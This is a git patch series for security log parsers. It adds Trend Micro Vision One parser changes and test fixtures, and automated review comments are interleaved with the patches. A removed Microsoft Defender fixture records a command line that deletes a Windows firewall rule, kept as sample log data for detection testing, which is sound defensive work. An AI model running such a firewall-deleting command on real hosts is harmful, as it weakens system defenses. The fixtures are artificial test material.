\"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "process" 
@@ -19,115 +19,73 @@ "info" ] }, - "@timestamp": "2024-11-08T14:38:51.907372Z", + "@timestamp": "2024-10-22T15:09:44.594155Z", "action": { "properties": { - "AccountSid": "S-1-2-3", - "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "InitiatingProcessFileSize": 145408, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", - "InitiatingProcessVersionInfoInternalFileName": "file", - "InitiatingProcessVersionInfoOriginalFileName": "file.exe", - "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", - "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", - "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessTokenElevation": "TokenElevationTypeDefault", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Network Command Shell", - "ProcessVersionInfoInternalFileName": "processcommand.exe", - "ProcessVersionInfoOriginalFileName": "processcommand.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "10.0.22621.1" + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, "file": { - "directory": "C:\\Windows\\processcommand.exe", + "directory": "/usr/bin/ps", "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + "md5": "098f6bcd4621d373cade4e832627b4f6", + "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" }, - "name": "processcommand.exe", - "size": 82944 + "name": "ps", + "size": 
144632 }, "host": { - "id": "123456789abcdef", - "name": "host.group.local" + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" }, "microsoft": { "defender": { "report": { - "id": "17318" + "id": "67417" } } }, "process": { "args": [ - "HTTP", - "advfirewall", - "delete", - "embedded", - "firewall", - "incoming", - "name=\"program=description=", - "rule", - "server", - "traffic\"" + "--no-headers", + "-A", + "-o", + "comm,pid,pcpu,pmem,rss,etimes" ], - "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", - "name": "processcommand.exe", + "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "args": [ - "-Embedding", - "ABCDEF0123456789", - "E", - "Global\\HOST0000" - ], "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" + "status": "Unknown", + "subject_name": "Unknown" }, - "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "executable": "c:\\windows\\file.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "file.exe", - "pid": 10868, - "start": "2024-11-08T14:38:00.674494Z", + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", "user": { - "domain": "account domain", - "id": "S-1-2-3", - "name": "syst\u00e8me" - }, - "working_directory": "c:\\windows" + "domain": "computer", + "name": "root" + } }, - "pid": 4520, - "start": "2024-11-08T14:38:51.903048Z", - "working_directory": "C:\\Windows" + "pid": 423627, + "start": "2024-10-22T15:09:44.594155Z", + "working_directory": "/usr/bin" }, "related": { "hash": [ - "44543e0c6f30415c670c1322e61ca68602d58708", - "51a9cac9c4e8da44ffd7502be17604ee", - "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", - 
"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+ "098f6bcd4621d373cade4e832627b4f6",
+ "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
+ "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
 ],
 "user": [
- "syst\u00e8me"
+ "root"
 ]
 },
 "user": {
- "domain": "account domain",
- "name": "syst\u00e8me"
+ "domain": "computer",
+ "name": "root"
 }
 }
 }
\ No newline at end of file
From a284a656b8d0f342bbdb8a6e70cb8332adc31db6 Mon Sep 17 00:00:00 2001
From: vg-svitla <131353512+vg-svitla@users.noreply.github.com>
Date: Thu, 28 Nov 2024 14:14:52 +0200
Subject: [PATCH 102/150] Update SentinelOne/identity/_meta/manifest.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Sébastien Quioc
---
 SentinelOne/identity/_meta/manifest.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml
index 33be89396..1d18ad943 100644
--- a/SentinelOne/identity/_meta/manifest.yml
+++ b/SentinelOne/identity/_meta/manifest.yml
@@ -1,6 +1,6 @@
 uuid: b502e522-6996-4b12-9538-f69326b68243
-name: identity
-slug: identity
+name: SentinelOne Singularity Identity
+slug: sentinelone-singularity-identity
 description: >-
 SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats.
From db978530c9756d0b397b872be52be2cb07b45727 Mon Sep 17 00:00:00 2001
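Review bot: The rewrite swaps the Windows process-creation case for a Linux one inside the same fixture instead of adding a second file, so the Windows-only mappings the old expected output exercised — `action.properties.ProcessIntegrityLevel`, `ProcessTokenElevation`, the `process.parent.code_signature` `Valid` status, `process.parent.hash.*` and `process.parent.args` — lose the only check visible in this chunk. Unless another fixture in this commit still covers them, keeping the old expected block as its own test file next to the new one preserves that coverage. The new case itself looks self-consistent: the `related.hash` entries match the new `file.hash` values and `related.user` matches `user.name`. The commit record and the file header for this hunk lie outside this chunk.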
From: lvoloshyn-sekoia
Date: Thu, 28 Nov 2024 14:58:43 +0200
Subject: [PATCH 103/150] Trend Micro Vision One - improve parser
---
 .../trend-micro-vision-one/_meta/fields.yml | 10 +++
 .../trend-micro-vision-one/ingest/parser.yml | 54 +++++++------
 .../tests/test_eicar_test_file_detection.json | 57 ++++++++++++++
 .../tests/test_information_gathering.json | 76 +++++++++++++++++++
 .../tests/test_internal_network_scanner.json | 1 +
 .../tests/test_process.json | 1 +
 .../tests/test_project_injection.json | 76 +++++++++++++++++++
 .../tests/test_registry.json | 1 +
 .../tests/test_service_abuse.json | 74 ++++++++++++++++++
 9 files changed, 328 insertions(+), 22 deletions(-)
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
index f18d3cb5d..2f93f2919 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/fields.yml
+++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
@@ -1,3 +1,8 @@
+action.properties.ScriptBlockText:
+ description: ''
+ name: action.properties.ScriptBlockText
+ type: keyword
+
 trendmicro.vision_one.alert_id:
 description: ''
 name: trendmicro.vision_one.alert_id
@@ -8,6 +13,11 @@ trendmicro.vision_one.case_id:
 name: trendmicro.vision_one.case_id
 type: keyword
+trendmicro.vision_one.detection_name:
+ description: ''
+ name: trendmicro.vision_one.detection_name
+ type: keyword
+
 trendmicro.vision_one.incident_id:
 description: ''
 name: trendmicro.vision_one.incident_id
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 09ca7f331..0353bb37b 100644
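Review bot: Both new field definitions ship with `description: ''`, so the schema tells an analyst nothing about what `action.properties.ScriptBlockText` holds, even though the parser change in this commit fills it from the `objectRawDataStr` indicator, i.e. raw script content rather than a file path or hash. Suggested for the first hunk: `description: 'Raw script content reported by Vision One (objectRawDataStr indicator)'`, and for the second hunk (`trendmicro.vision_one.detection_name`): `description: 'Detection name reported by Vision One (detection_name indicator)'`. The neighbouring entries carry the same empty description, so this only continues the file's habit; filling the two new ones in is still cheap while the source of each value is fresh.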
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
@@ -25,12 +25,13 @@ stages:
 - set:
 "@timestamp": "{{parsed_event.message.createdDateTime}}"
- host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}"
- host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}"
+ host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}"
+ host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}"
+ host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}"
- user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}"
- container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}"
- container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}"
+ user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}"
+ container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}"
+ container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}"
 rule.name: "{{parsed_event.message.model}}"
 rule.id: "{{parsed_event.message.model.modelId}}"
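Review bot: The context line `rule.id: "{{parsed_event.message.model.modelId}}"` at the end of this hunk can never resolve, because `model` is a plain string in the payload (`"model": "Eicar Test File Detection"`) while `modelId` is a sibling top-level key; the new test_eicar_test_file_detection.json fixture confirms it, since its expected `rule` object carries only `name`. The same mistake sits on the `event.url` context line of the next hunk (`parsed_event.message.model.workbenchLink`, with `workbenchLink` likewise top-level), and that fixture's expected `event` object has no `url` either. Suggested: `rule.id: "{{parsed_event.message.modelId}}"` and `event.url: "{{parsed_event.message.workbenchLink}}"`, with the new fixtures' expected output extended to pin both values. The `set` stage these lines belong to continues past the end of the hunk.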
@@ -38,7 +39,7 @@ stages:
 event.url: "{{parsed_event.message.model.workbenchLink}}"
 - set:
- user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"
+ user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}"
 - set:
 user.name: "{{final.user.id.split('\\\\') | last}}"
@@ -46,18 +47,23 @@ stages:
 filter: "{{final.user.id != null}}"
 - set:
- process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}"
- process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}"
- process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}"
- process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}"
- process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}"
- process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}"
- process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}"
+ process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}"
+ process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}"
+ process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}"
+ process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}"
+ process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}"
+ process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}"
+
+ process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}"
+ process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}"
+
+ process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}"
+ process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}"
 - set:
- registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}"
- registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}"
- registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}"
+ registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}"
+ registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}"
+ registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}"
 registry.path: >
 {%- set path = [] -%}
 {%- for indicator in parsed_event.message.indicators -%}
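Review bot: The new `process.pid` line takes `first` over `selectattr('field', 'in', ['processPid', 'objectPid'])`, so for a payload that carries both indicators the winner is whichever appears first in `indicators`, not a stated preference. That matters because the sibling fields pair by role: `process.command_line` and `process.hash.*` are taken from `processCmd`/`processFileHash*`, and in the new test_information_gathering.json fixture `processCmd` (PowerShell_ISE) and `objectCmd` (whoami.exe) are different processes, so an `objectPid` winning the race would attach the object's PID to the acting process's command line. An explicit fallback in the style the removed `file.path` expression of the next hunk used keeps the pairing deterministic: `process.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processPid') | first).value or (parsed_event.message.indicators | selectattr('field', '==', 'objectPid') | first).value }}"`. The two bare `+` lines inserted inside the `set` mapping are valid YAML but do not occur elsewhere in the visible stages; the registry `set` stage at the end continues past the hunk.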
@@ -68,19 +74,22 @@ stages:
 {%- endfor -%}
 {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%}
- registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}"
+ registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}"
 - set:
 registry.data.type: "REG_SZ"
 filter: "{{final.registry.data.strings != null }}"
 - set:
- file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}"
- file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}"
- file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}"
- file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}"
+ file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}"
+ file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}"
+ file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}"
+ file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}"
- user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}"
+ user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}"
+
+ - set:
+ action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}"
 - set:
trendmicro.vision_one.severity: "{{parsed_event.message.severity}}"
@@ -89,3 +98,4 @@ stages:
 trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}"
 trendmicro.vision_one.status: "{{parsed_event.message.status}}"
 trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}"
+ trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
new file mode 100644
index 000000000..5fb30866d
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
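Review bot: The new `file.path` line silently drops the `filePath` fallback the removed expression carried (`... or (... 'filePath' ...)`) and substitutes `fullPath`, so a payload that still reports `filePath` would now leave `file.path` empty; none of the fixtures in this chunk carry `filePath`, so this may be deliberate, but if both spellings occur in the wild `selectattr('field', 'in', ['objectFilePath', 'fullPath', 'filePath'])` keeps all three without changing the others. In the same `set`, `file.hash.sha1` gained the `type`-gated `fileHash` alternative the new Eicar fixture needs (`type: file_sha1`, `field: fileHash`), while `file.hash.sha256` still matches `objectFileHashSha256` only; if Vision One also emits `fileHash` with `type: file_sha256`, the sha256 line should mirror the sha1 form for consistency. The trailing `- set:` stage of this hunk continues outside it.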
@@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": 
\"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, 
\"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": 
[\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "kind": "alert",
+ "reason": "Eicar Test File Detection",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-26T16:51:29Z",
+ "file": {
+ "hash": {
+ "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8"
+ },
+ "name": "eicar-com.txt",
+ "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt"
+ },
+ "host": {
+ "id": "ecede9e8-407e-4f34-9747-4a145c247ad5",
+ "ip": [
+ "10.0.0.6"
+ ],
+ "name": "windows10"
+ },
+ "observer": {
+ "product": "Vision One",
+ "vendor": "TrendMicro"
+ },
+ "related": {
+ "hash": [
+ "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8"
+ ],
+ "ip": [
+ "10.0.0.6"
+ ]
+ },
+ "rule": {
+ "name": "Eicar Test File Detection"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "detection_name": "Eicar_test_1",
+ "investigation_status": "New",
+ "severity": "low",
+ "status": "Open"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
new file mode 100644
index 000000000..4d60422b4
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": 